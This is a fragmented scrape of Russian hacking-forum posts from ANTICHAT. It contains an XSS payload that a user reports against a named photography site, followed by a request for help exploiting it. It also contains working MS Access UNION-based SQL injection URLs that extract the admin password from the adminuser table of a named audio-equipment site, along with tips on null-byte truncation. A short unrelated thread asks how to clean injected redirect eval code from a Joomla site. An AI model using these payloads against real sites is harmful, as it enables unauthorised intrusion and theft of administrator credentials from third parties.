ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Спасибо

Подскажите что можно сделать

http://www.mywed.ru/photographer/popular/

вбивая в строку поиска

'">alert('a');

нажимаем найти получаем ошибку, и потом кликаем на ссылку войти

отрабатывает alert()

Как это использовать можно.

Там PostgreSQL, можно инъекцию провести.

Но как я понял по ошибкам там Zend фреймворк и используется PDO, просто там не получится.

Помогиет кто-нить раскурить эту ссылку... Если не трудно в ЛС... что и как вы сделали... там вроде как MSAccess но с данной СУБД у меня ничего не получается((

Угу. Это MsAccess

_ttp://www.mooeraudio.com/en/ProductInfo.asp?id=13+and+1=2+union+select+1,2,3,1 11222333444,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9+from+adminuser%00

_ttp://www.mooeraudio.com/en/ProductInfo.asp?id=13+and+1=2+union+select+1,2,3,( select+top+1+cstr([adminpwd])+from+(select+top+1+*+from+(select+top+1+*+from+[adminuser]+order+by+1)+t+order+by+1+desc)t),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19+from+adminuser%00

4 самых важных момента

1) Выборка всегда должна идти из какой-либо таблицы, иначе запрос некорректен

2) Для отсечения зпроса работает только нулл байт %00 или %16

3) Все таблицы/колонки подбираются в слепую, при условии что не доступны сисемные таблички.

4) Для конвертирования получаемых данных в строковый тип используй cstr()

Приветствую, помогающие!

Подскажите как быстро избавится от eval, в скриптах? Очень часто сталкиваюсь, что весь joomla сайт, включая системные скрипты, файлов шаблонов подвержен вставкам eval. Скорее всего вставляют автоматом, т.к. все в одном месте (расположение eval'ов), все eval одни и те же - редиректят мобильный траф.

Тебе поможет suhosin-extension

Вот можешь здесь почитать про его настройки

уязвимы?